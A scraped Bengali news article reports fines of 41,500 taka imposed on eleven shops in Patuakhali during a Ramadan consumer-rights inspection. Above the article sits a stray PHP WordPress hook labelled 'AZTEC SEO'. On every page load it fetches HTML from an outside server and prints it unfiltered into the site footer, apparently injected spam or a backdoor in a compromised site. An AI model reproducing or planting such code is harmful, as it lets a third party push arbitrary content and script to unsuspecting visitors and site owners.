/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); পটুয়াখালীতে অভিযান চালিয়ে ১১ দোকানীকে ৪১,৫০০ টাকা জরিমানা | Dhaka Sky News

বীর শহিদদের প্রতি রাষ্ট্রপতি-প্রধানমন্ত্রীর ফুলেল শ্রদ্ধা

আগের সংবাদ

সৌদিতে বাস উল্টে ২০ ওমরাহ যাত্রী নিহত

পরের সংবাদ

পটুয়াখালীতে অভিযান চালিয়ে ১১ দোকানীকে ৪১,৫০০ টাকা জরিমানা

পটুয়াখালী প্রতিনিধি

প্রকাশিত: March 26, 2023 , 11:56 am

পটুয়াখালীতে রমজানের পবিত্রতা রক্ষায় ভোক্তা অধিকার সংরক্ষণ অধিদপ্তরের উদ্যোগে ২২ মার্চ বুধবার জেলার বাউফল উপজেলার কালিশুরী বাজারে সকাল ১০টা হতে দুপুর ১.৩০ মিঃ পর্যন্ত অভিযান পরিচালনা করে ভেজাল বিরোধী ও নির্ধারিত মূল্যের চেয়ে অতিরিক্ত দামে পণ্য বিক্রি, মূল্য তালিকা না টানানো, অস্বাস্থ্যকর পরিবেশে খাদ্যদ্রব্য তৈরী, সংরক্ষণ ও বিক্রয় পণ্যে মোড়কে উৎপাদনের তারিখ না থাকার অপরাধে ১১টি দোকানীকে সর্বমোট ৪১ হাজার ৫০০ টাকা জরিমানা করা হয়। এর মধ্যে মেসার্স সোবাহান স্টোরে ৫ হাজার টাকা, নুরুল ভ্যারাইটিস স্টোরে ৩ হাজার টাকা, সাইফুল সুইটস এন্ড রেস্টুরেন্টে ৫ হাজার টাকা, মেসার্স খান ট্রেডার্স মালিককে ২ হাজার টাকা, ক্যাফে ছায়া মনির মালিককে ৩০০০ টাকা, মেসার্স আল্লাহর দান স্টোর মালিককে ২ হাজার টাকা, মেসার্স নুরু খান স্টোর্স মালিককে ৫ হাজার টাকা, মেসার্স আবুল সন্যামত স্টোর মালিককে ৩,৫০০ টাকা, মেসার্স বৃষ্টি স্টোর মালিককে ৩,৫০০ টাকা, মেসার্স সুকুল এ ব্রাদার্স মালিককে ৩ ৫০০ টাকা ও মেসার্স ভাই ভাই স্টোর মালিককে ৬০০০ টাকাসহ মোট ৪১, ৫০০ টাকা জরিমানা করা হয়েছে বলে পটুয়াখালী জেলা ভোক্তা অধিকার সংরক্ষণ অধিদপ্তরের সহকারী পরিচালক শাহ শোয়াইব মিয়া জানান।
ভোক্তা অধিকার সংরক্ষন আইন-২০০৯ এর ৩৭, ৩৮, ৪৩ এবং ৪৫ ধারা মোতাবেক উক্ত অর্থদণ্ড প্রদান করা হয়েছে বলে ভোক্তা অধিকার সংরক্ষণ অধিদপ্তরের সহকারী পরিচালক শাহ শোয়াইব জানান। এ অভিযান চলবে বলেও জানান তিনি।